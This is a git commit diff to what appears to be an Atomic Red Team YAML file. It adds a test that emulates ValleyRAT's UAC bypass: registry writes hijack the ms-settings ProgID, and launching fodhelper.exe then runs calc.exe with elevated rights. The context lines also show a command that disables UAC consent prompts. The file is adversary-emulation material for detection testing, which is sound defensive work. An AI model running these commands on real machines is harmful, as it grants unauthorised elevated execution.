Uac bypassed via prog i ds (#2940)

* ShrinkLocker PIN,TPM Bitlocker Registry Modification * Revert "ShrinkLocker PIN,TPM Bitlocker Registry Modification" * Update T1548.002.yaml --------- Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-09-24 17:30:06 +02:00
parent e851100c42
commit df25f7e1ff
1 changed files with 20 additions and 1 deletions
@@ -692,4 +692,23 @@ atomic_tests:
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    cleanup_command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
-    name: command_prompt
+    name: command_prompt
+
+- name: UAC bypassed by Utilizing ProgIDs registry.
+  auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
+  description: |
+    This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
+
+      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
+      
+      echo Triggering fodhelper.exe for potential privilege escalation...
+      start fodhelper.exe
+    cleanup_command: |
+       reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
+       reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
+    name: command_prompt